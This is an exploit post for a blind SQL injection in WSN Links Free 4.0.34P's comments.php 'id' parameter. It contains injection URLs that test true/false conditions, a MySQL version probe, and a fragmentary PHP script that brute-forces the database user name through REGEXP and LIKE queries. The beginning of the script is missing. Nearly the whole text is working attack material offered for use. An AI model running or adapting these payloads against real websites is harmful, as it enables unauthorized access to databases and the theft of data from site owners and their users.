[-]Powered by WSN Links Free 4.0.34P Blind SQL Injection By Stack exploit: http://site.com/path/comments.php?id=1 and 2>1/* #the page fully loaded http://site.com/path/comments.php?id=1 and 1>3/* #page loaded whit any data and some error that say "No such content exists. The link you are following seems to have been incorrect." cheking the mysql version: http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=5 or http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=4 # you can exploting the bug white blind sql automatic toolz such as sqlmap or ... simple exploit to get user() " ,'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','.','*','%','é','&' ); echo "\n[+] BF Longeur User : "; $stop = false ; while($stop == false){ $lenregexp = stringtohex('^.{'.$login_len.'}$'); $xurl = $url."+AND+(SELECT+user())+REGEXP+$lenregexp/**" ; $rep = file_get_contents($xurl); if(preg_match("#$regexp#",$rep)){ echo $login_len ; $stop = true ; } if($stop == false) $login_len++ ; } echo "\n[+] BF du User : "; for($i=0; $i<= $login_len; $i++){ $ok = false ; foreach($alphabet_Stack as $Stackl){ if($ok == true) continue ; $like = stringtohex($login.$Stackl); $urlx = $url."+AND+(SELECT+user())+LIKE+concat($like,0x25)/*"; $rep = file_get_contents($urlx) ; if(preg_match("#$regexp#",$rep)){ echo $Stackl ; $login .= $Stackl ; $ok = true ; } } } echo "\n\n[+] Injection Completed \n"; echo "\t User : $login\n\t"; ?>